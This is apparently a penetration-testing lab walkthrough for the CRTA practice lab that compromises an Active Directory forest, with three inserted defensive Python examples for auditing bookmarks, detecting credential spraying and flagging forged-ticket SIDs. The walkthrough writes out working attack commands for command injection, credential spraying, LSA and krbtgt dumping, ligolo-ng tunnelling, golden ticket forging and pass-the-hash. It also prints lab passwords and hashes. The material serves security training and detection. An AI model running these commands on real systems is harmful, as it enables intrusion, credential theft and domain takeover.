CRTA Practise Lab Walkthrough - CRTA_Practise_Lab_Walkthrough

The document outlines a penetration testing process involving initial access through a VPN and scanning of IP ranges. It details steps taken to exploit vulnerabilities, including command execution via an email field, credential dumping, and lateral movement within the network using tools like crackmapexec and ligolo-ng. The final stages include extracting sensitive credentials and forging a golden ticket for further access to the Parent Domain Controller.

Scope Access

VPN: 10.10.200.0/24

External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]

Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]

Initial Access

Scanning Available Hosts

nmap -sn 192.168.80.0/24

PS: If you cannot discover the IPs, the server may have temporary ping
blocking enabled. You can specifically scan the following IPs.

We can see one host up; let's scan 192.168.80.10

nmap -sC -sV 192.168.80.10

© All Rights Reserved CyberWarFare Labs


We can see port 80 open, so let's visit the website:

There we can see a signup link; let's try signing up a new account and
see whether it works.



We signed up with a random username and password, and logging in with
them took us to the dashboard.

Then we intercepted some of the traffic from the website, and one
interesting field we found was the newsletter email field.



We found command execution in the email field:

Let's try to dump critical files such as /etc/passwd.

There we found a privileged user with credentials:

Let's ssh into the machine with the credentials discovered in the
“/etc/passwd” file.

ssh [email protected]

The credentials were correct; we got initial access to the machine.

Enumeration
Enumerating the machine gives a few leads to move forward.
We saw this machine has another adapter as well, connected to a different
network.

Now let's search for browser history / bookmarks; we found that the
machine has Mozilla Firefox installed.

ls -la .mozilla/
cd .mozilla/firefox/
# The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release

We will use sqlite3 to access the firefox database as follows :

sqlite3 places.sqlite
.tables
select * from moz_bookmarks;

We found some interesting credentials in the mozilla bookmarks database.
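Credentials pasted into bookmarks are exactly the kind of finding a defender wants to surface during a workstation audit before anyone else does. The following script is an added example, not part of this lab material: it builds a small constructed stand-in for places.sqlite (only the moz_places and moz_bookmarks columns the audit needs, with made-up hosts and secrets) and flags every URL bookmark that carries userinfo in the URL, a password-like query parameter, or a credential keyword in its title. Note that the bookmark's URL lives in moz_places, which moz_bookmarks references through its fk column, so the query joins the two tables rather than reading moz_bookmarks alone.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlparse

# Constructed sample bookmarks (title, url); hosts and credentials are made up.
SAMPLE_BOOKMARKS = [
    ("Corp wiki", "https://wiki.example.internal/home"),
    ("Mgmt console (login)", "http://svc_backup:Hypothetical1@mgmt.example.internal:8080/"),
    ("Monitoring", "https://mon.example.internal/?user=ops&password=Winter2024"),
    ("Ticketing", "https://tickets.example.internal/queue"),
]

# Query-string keys and title words that usually mean a secret was pasted into a bookmark
QUERY_SECRET_KEYS = {"password", "passwd", "pwd", "pass", "token", "apikey", "api_key"}
TITLE_SECRET_RE = re.compile(r"\b(password|passwd|pwd|creds?|credentials?)\b", re.I)


def build_sample_db(rows=SAMPLE_BOOKMARKS):
    """In-memory stand-in for places.sqlite holding only the columns the audit joins on.
    The real moz_places / moz_bookmarks tables have many more columns."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT NOT NULL, title TEXT);
        CREATE TABLE moz_bookmarks (id INTEGER PRIMARY KEY, type INTEGER NOT NULL,
                                    fk INTEGER, parent INTEGER, title TEXT);
        """
    )
    for place_id, (title, url) in enumerate(rows, start=1):
        conn.execute("INSERT INTO moz_places (id, url, title) VALUES (?, ?, ?)",
                     (place_id, url, title))
        # type 1 = URL bookmark; parent 2 = the bookmarks menu root in Firefox
        conn.execute("INSERT INTO moz_bookmarks (type, fk, parent, title) VALUES (1, ?, 2, ?)",
                     (place_id, title))
    conn.commit()
    return conn


def classify(title, url):
    """Return the reasons a bookmark looks like it carries a secret (empty list if clean)."""
    reasons = []
    parsed = urlparse(url)
    if parsed.username or parsed.password:
        reasons.append("userinfo-in-url")
    if any(key.lower() in QUERY_SECRET_KEYS for key in parse_qs(parsed.query)):
        reasons.append("secret-in-query")
    if title and TITLE_SECRET_RE.search(title):
        reasons.append("secret-keyword-in-title")
    return reasons


def find_credential_bookmarks(conn):
    """Audit every URL bookmark; report id, title and host only, never the secret itself."""
    sql = ("SELECT b.id, b.title, p.url FROM moz_bookmarks b "
           "JOIN moz_places p ON p.id = b.fk WHERE b.type = 1 ORDER BY b.id")
    findings = []
    for bookmark_id, title, url in conn.execute(sql):
        reasons = classify(title or "", url)
        if reasons:
            findings.append({"bookmark_id": bookmark_id, "title": title,
                             "host": urlparse(url).hostname, "reasons": reasons})
    return findings


if __name__ == "__main__":
    # For a real profile, point sqlite3.connect() at a copy of places.sqlite instead
    for f in find_credential_bookmarks(build_sample_db()):
        print(f"{f['bookmark_id']}: {f['title']!r} on {f['host']} -> {', '.join(f['reasons'])}")
```

Firefox keeps places.sqlite locked while it is running, so an audit should work on a copy of the file; the report deliberately prints the host and bookmark id rather than the URL so the secret is not copied into yet another place.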



Bookmark:

We have to perform pivoting as 192.168.98.0/24 is not directly accessible
from the VPN network. We will utilize ligolo-ng for the same.

#Attacker Machine, download proxy & agent :

#Proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

#Agent
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

Set up the ligolo-ng proxy on the attacker machine & the ligolo-ng agent on
the victim machine.

# Attacker Machine
sudo ip tuntap add user <your_user> mode tun ligolo


#Delete the 192.168.98.0/24 IP Range from the tun0 interface :
sudo ip route del 192.168.98.0/24 dev tun0

#Up the ligolo interface :
sudo ip link set ligolo up

#Add 192.168.98.0/24 IP range to the ligolo interface :
sudo ip route add 192.168.98.0/24 dev ligolo

Confirm the route on your attacker machine. The internal IP range is now
added in the route.

Start the proxy on the attacker machine:

./proxy -selfcert -laddr 0.0.0.0:443

Transfer the agent to the victim machine & start the connection:

#Replace this with your attacker IP address.
./agent -connect 10.10.200.X:443 -ignore-cert

On the server side, we can check that the agent connected successfully.

On the ligolo-ng proxy, check the session & start the tunnel.

session
list_tunnels
start

Now, fire up a new terminal & check that we can now access the internal IP
range 192.168.98.0/24

Initial Access
Let's first scan for available hosts in the internal network
[192.168.98.0/24]. We can see three hosts are up with nmap:

nmap -sn 192.168.98.0/24

Let's spray the discovered credentials in the network using the crackmapexec
toolkit.

#Create a txt file with live hosts in the 192.168.98.0/24 network :

cat target.txt
192.168.98.2
192.168.98.15
192.168.98.30
192.168.98.120

#Now, use cme to spray the credentials :

crackmapexec --verbose smb target.txt -u john -p User1@#$%6

Great! It seems that the user “john” is local administrator on the “192.168.98.30”
machine, whose name is “MGMT”.

Now, let's dump the LSA secrets using the crackmapexec toolkit; it utilizes
impacket's secretsdump module for the same.

crackmapexec --verbose smb 192.168.98.30 -u john -p User1@#$%6 --lsa

Sweet!! Got the clear-text credentials of the user “corpmngr”

Again, let's spray the credentials in the network using the crackmapexec
toolkit.

# Spray again in the network with the new credentials :

crackmapexec --verbose smb target.txt -u corpmngr -p 'User4&*&*'

Awesome, we got the credentials working as local administrator on the
“CDC” machine at “192.168.98.120”.
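Each of the two sprays above leaves the same footprint on the target side: a single account, from a single source address, authenticating against several hosts within a few seconds, mostly failing (Windows event 4625) with the occasional success (4624). The detector below is an added example and not part of the lab material; it runs over a constructed set of normalised logon events (hosts, accounts and addresses are made up) and flags any account/source pair that touches at least three distinct hosts inside a 60-second window. The window and threshold are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of normalised Windows logon events as a SIEM might store them:
# (timestamp, reporting host, event id, account, source address).
# 4624 = successful logon, 4625 = failed logon. All values are made up.
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:01", "WS01", 4625, "svc_ops", "10.0.0.5"),
    ("2024-05-01T10:00:02", "FS01", 4625, "svc_ops", "10.0.0.5"),
    ("2024-05-01T10:00:02", "MGMT", 4624, "svc_ops", "10.0.0.5"),
    ("2024-05-01T10:00:03", "CDC",  4625, "svc_ops", "10.0.0.5"),
    ("2024-05-01T10:05:00", "WS01", 4624, "alice",   "10.0.0.40"),
    ("2024-05-01T10:06:00", "FS01", 4624, "alice",   "10.0.0.40"),
    ("2024-05-01T11:30:00", "CDC",  4624, "alice",   "10.0.0.40"),
]


def detect_spray(events, window_seconds=60, min_hosts=3):
    """Flag (account, source) pairs that authenticate, successfully or not, against at
    least `min_hosts` distinct hosts inside any span of `window_seconds`.
    Returns one alert per pair, describing the densest window found."""
    window = timedelta(seconds=window_seconds)
    by_key = defaultdict(list)
    for ts, host, event_id, account, src in events:
        if event_id in (4624, 4625):
            by_key[(account, src)].append((datetime.fromisoformat(ts), host))
    alerts = []
    for (account, src), rows in by_key.items():
        rows.sort()
        best = None
        left = 0
        for right in range(len(rows)):  # sliding window over time-ordered events
            while rows[right][0] - rows[left][0] > window:
                left += 1
            hosts = {h for _, h in rows[left:right + 1]}
            if len(hosts) >= min_hosts and (best is None or len(hosts) > len(best["hosts"])):
                best = {"account": account, "source": src, "hosts": hosts,
                        "window_start": rows[left][0].isoformat()}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_EVENTS):
        print(f"{a['account']} from {a['source']} hit {sorted(a['hosts'])} "
              f"starting {a['window_start']}")
```

Counting failures and successes together is deliberate: a spray that lands on one host is precisely the case worth catching, and the lone 4624 on that host looks unremarkable on its own. The second account in the sample visits three hosts too, but spread over ninety minutes, so it stays under the default window.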

Since we know the machine name & the domain, let's update the same in
our hosts file.

sudo nano /etc/hosts

192.168.98.2 warfare.corp dc01.warfare.corp
192.168.98.120 child.warfare.corp cdc.child.warfare.corp

We are local administrator on the Child Domain Controller. Let's extract the
hash of the “krbtgt” account using impacket's secretsdump script. We will forge
a golden ticket to compromise the Parent Domain Controller.

secretsdump.py -debug child/corpmngr:'User4&*&*'@cdc.child.warfare.corp -just-dc-user 'child\krbtgt'

#Results :

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900
krbtgt:aes256-cts-hmac-sha1-96:ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2

We will perform SID extraction using the lookupsid python script.

lookupsid.py child/corpmngr:'User4&*&*'@child.warfare.corp
lookupsid.py child/corpmngr:'User4&*&*'@warfare.corp

So far we have got the following details :

#Result :

1. krbtgt aes256 Hash : ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2

2. Parent SID : S-1-5-21-3375883379-808943238-3239386119

3. Child SID : S-1-5-21-3754860944-83624914-1883974761

We will forge a golden ticket using ticketer as follows :

ticketer.py -domain child.warfare.corp -aesKey ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2 -domain-sid S-1-5-21-3754860944-83624914-1883974761 -groups 516 -user-id 1106 -extra-sid S-1-5-21-3375883379-808943238-3239386119-516,S-1-5-9 'corpmngr'
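The -extra-sid values in the ticket above are what makes the child-domain user acceptable to the parent: the forged PAC claims membership of the parent domain's RID 516 group and carries the Enterprise Domain Controllers SID S-1-5-9. SID filtering strips exactly such foreign privileged SIDs on a filtered trust, but it is not applied to the parent/child trust inside a forest, which is why the forest, not the domain, is the security boundary. As an added example that is not part of this walkthrough, the Python below applies the same rule a defender can run over the group membership Windows records for a new logon (event 4627): it parses a constructed, trimmed rendering of such an event built from the SIDs the walkthrough prints, and flags any privileged well-known RID that belongs to a domain other than the account's own, plus any DC-only SID appearing in a user logon. The event layout and the logon ID are simplified for the example.

```python
import re

# Well-known RIDs whose presence from a *foreign* domain in a logon token is a strong signal
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
}
# Well-known SIDs that belong to domain controller machine accounts, never to a user
DC_ONLY_SIDS = {"S-1-5-9": "Enterprise Domain Controllers"}

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")
ANY_SID_RE = re.compile(r"S-1-\d+(?:-\d+)+")

# Constructed, trimmed rendering of a Windows 4627 "Group membership information" event.
# The child user's normal groups are followed by the two SIDs injected into the forged PAC.
SAMPLE_EVENT_4627 = """\
Group membership information.
New Logon:
    Security ID:        S-1-5-21-3754860944-83624914-1883974761-1106
    Account Name:       corpmngr
    Account Domain:     CHILD
    Logon ID:           0x3E7A1
Logon Type:             3
Group Membership:
        S-1-5-21-3754860944-83624914-1883974761-513
        S-1-1-0
        S-1-5-32-545
        S-1-5-21-3375883379-808943238-3239386119-516
        S-1-5-9
"""


def split_domain_sid(sid):
    """Split a domain SID into (domain part, RID); (None, None) for non-domain SIDs."""
    m = DOMAIN_SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else (None, None)


def parse_4627_event(text):
    """Return (account SID, [group SIDs]) from the event text."""
    head, _, groups = text.partition("Group Membership:")
    new_logon = head.split("New Logon:", 1)[1]
    return ANY_SID_RE.search(new_logon).group(0), ANY_SID_RE.findall(groups)


def audit_logon_sids(account_sid, group_sids):
    """Flag group SIDs that SID filtering would strip on a filtered trust (a privileged RID
    from a domain other than the account's own) or that a user token should never carry."""
    home_domain, _ = split_domain_sid(account_sid)
    alerts = []
    for sid in group_sids:
        if sid in DC_ONLY_SIDS:
            alerts.append((sid, f"{DC_ONLY_SIDS[sid]} present in a user logon"))
            continue
        domain, rid = split_domain_sid(sid)
        if domain is None or domain == home_domain:
            continue  # built-in / local SID, or a group from the user's own domain
        if rid in PRIVILEGED_RIDS:
            alerts.append((sid, f"foreign-domain {PRIVILEGED_RIDS[rid]} (RID {rid})"))
    return alerts


if __name__ == "__main__":
    acct, groups = parse_4627_event(SAMPLE_EVENT_4627)
    for sid, why in audit_logon_sids(acct, groups):
        print(f"ALERT {acct}: {sid} -> {why}")
```

Ordinary cross-domain group membership (a parent-domain group with a custom RID) passes this check untouched; only the handful of RIDs that confer domain- or forest-wide control are flagged when they arrive from a domain the account does not belong to, so the rule stays quiet on legitimate traffic.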

Let's set the ccache file in the environment variable.

export KRB5CCNAME=corpmngr.ccache

Request a Service Ticket using the ccache file.

getST.py -spn 'CIFS/dc01.warfare.corp' -k -no-pass child.warfare.corp/corpmngr -debug

export KRB5CCNAME=corpmngr@[email protected]

Parent Domain Controller

We got the CIFS ticket for the Domain Controller as “corpmngr”; let's extract
the Administrator password hash using the secretsdump script.

secretsdump.py -k -no-pass dc01.warfare.corp -just-dc-user 'warfare\Administrator' -debug

Let's access the Parent Domain Controller with the Administrator hash :

psexec.py -debug 'warfare/[email protected]' -hashes aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60

If you like the practice lab, please give us a shoutout. Also, once you are
ready, feel free to drop an email to the support team
([email protected]) providing your availability in British
Summer Time (BST) in date & time format.
